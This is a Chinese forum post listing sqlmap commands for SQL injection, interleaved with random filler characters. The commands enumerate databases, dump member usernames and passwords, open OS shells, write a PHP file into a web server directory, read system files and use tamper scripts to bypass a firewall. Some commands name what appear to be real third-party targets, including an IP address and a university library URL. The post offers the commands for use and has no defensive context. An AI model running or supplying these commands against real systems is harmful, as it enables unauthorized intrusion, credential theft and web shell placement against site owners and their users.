找回密码
 立即注册
查看: 3272|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/pentest/database/sqlmap
! _: j1 _, I# E6 j1 U% h/ F% Z% \$ @0 T% d
update :::::>     in the folder   after  execute    following   order : svn update) v' M7 r8 r4 p5 F$ u. q
1 P. J+ h* \$ g2 I( z* `& D/ M
sqlmap.py -r 1.txt --current-db, G+ w. K' s6 L+ L' U
! ?+ t! Z* J0 y. Q' [/ p
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”+ `* q$ o$ s4 x& M- B5 i
& p  ?/ g! l; ~3 [- z4 o
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) * h; g/ ?; P' `" o* O, b0 [
猜解数据库" y/ D: H# {9 ]; }0 h, b  s
./sqlmap.py -u "injection-url" --dbs
3 [$ J& U- O" c1 T5 k( e( Bsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"3 f/ O, a  o8 p* q: Y% S, U* L" a

7 Q. |1 E5 @3 R猜解表名
5 x+ ]2 [1 i- h* J1 q./sqlmap.py -u "injection-url" -D database_name --tables/ a. Q7 f+ [4 q

! k" G. u2 ~/ h2 S* i+ L$ dsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
5 i7 H- F, G" _# v3 g# f' dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" " V% P$ c5 H( G$ X! g  D
; I) `/ Y) d" `# t
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump1 I$ ]" A) H* P$ E  b3 W
9 R1 h$ \* x% I% T: U
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
" ?* R# F6 l5 w- ~& Psqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"5 K3 j& I# L9 [3 {! u/ e' Z/ O
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
! L/ v2 f5 `0 F' Z+ t& v9 r4 Q) g: ksqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"+ e% N3 Z5 c* B! S/ b; N( c
7 c9 n% v0 ^1 ?7 M$ `
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"' S# \% n2 P3 A) {  p) g
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
, o) d3 k5 l8 E! {sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
( G4 u" W8 f5 U% T- asqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"9 E9 y- @+ o; q& K
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump* |" F( u* E2 \  U7 H1 D

! {* z( ?# N3 P4 u  Z% Wsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
3 Y: w' [0 l- ~+ K/ ?- L  s, lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"* d  y$ G. [8 K: s

- G4 M  D# S  wsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
$ v9 s( p" Q8 P/ s猜解列名
  f/ f- I  P% i3 F; S+ z$ ?./sqlmap.py -u "injection-url" -D database_name -T table_name --columns/ V' L' n! ?3 P" @" S

. W7 [6 `; A- Lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" - X  y3 G4 O7 K" r0 J6 a0 p
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
9 Y7 o# w  x# x. b7 r/ e! A0 R5 Usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"1 x" i3 V$ t) A2 L% h/ G7 g

& _' Q% x3 t& g5 Fsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"; c( C( I5 f" }  U, u- Z
&submit=Go
" G1 i& O, u" T7 B% \猜解值! W8 y8 p: Y7 S; ~
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
' F( r/ J6 N4 \/ Y- O: f, t: P========================================================  `. ?' W: T# _0 X: i7 ]
搜索表名中包括mana字符的+ a) i# p  k' }0 |
/sqlmap.py -u "injection-url" -T mana --search
! H; l' D1 v( [6 E, c' P& x返回一个交互式sql shell$ \8 g, |4 x) M9 j
/sqlmap.py -u "injection-url" --sql-shell
/ f4 S6 V! w; U读取指定文件(需权限)
: f7 B1 x' X5 F; {8 n! ?/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
3 M9 ]9 F) _: @查看当前 用户 及 数据库 & j4 Q1 M% I. j/ S5 Y2 w4 K' Y. w
/sqlmap.py -u "injection-url" --current-user --current-db5 }, _4 `. z/ z6 i
本地文件 写入 远程目标绝对路径
7 Y$ e; D6 B$ i( V' Z" Z/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径# r4 C) @4 [/ i" T3 y  l
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" . q7 U  A. W5 @& t1 w
2 B- B" _3 k# r. @
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
# ~+ o( |& U& w/ A5 e查看某用的权限* D: e, V" C2 D
/sqlmap.py -u "injection-url" --privileges -U root
& i# v1 |0 a) X: P- }6 C& M, u0 {查看当前用户是否为dba
. u6 r" ~+ E3 M5 K/sqlmap.py -u "injection-url" --is-dba
7 K( l$ n5 h9 I' Y读取所有数据库用户或指定数据库用户的密码
- b0 L# b7 v4 E9 X. d0 v4 Osqlmap.py -r 1.txt --users --passwords" H* F6 E  w! Z2 n8 I% H
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
, M' H( w9 Q$ @: v  r% r8 z# o
1 b! c) y! ^! l/sqlmap.py -u "injection-url" --passwords -U root
3 l! H  [" z  |2 w+ o" T9 y' y4 e" m5 T( x+ @; `( v2 a
--start&&--stop 与 --first&&--last 的区别) F) N. o* X4 U
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
& x0 k" p  `& l- G( }$ q3 {1 ^) z3 o5 R9 n
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)0 e3 \5 b( b& h% Q" d( E- H$ u$ I
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables( k3 X7 ~+ s) B+ C
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
8 E3 Z- `8 D+ X: T4 w( N: t  m$ L+ Y  R* v7 x
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
1 p0 ]2 I4 m) G/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"" f! P' ^0 h6 l- t5 t, c* f( C

1 f+ K" K! Z: F3 ~4 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表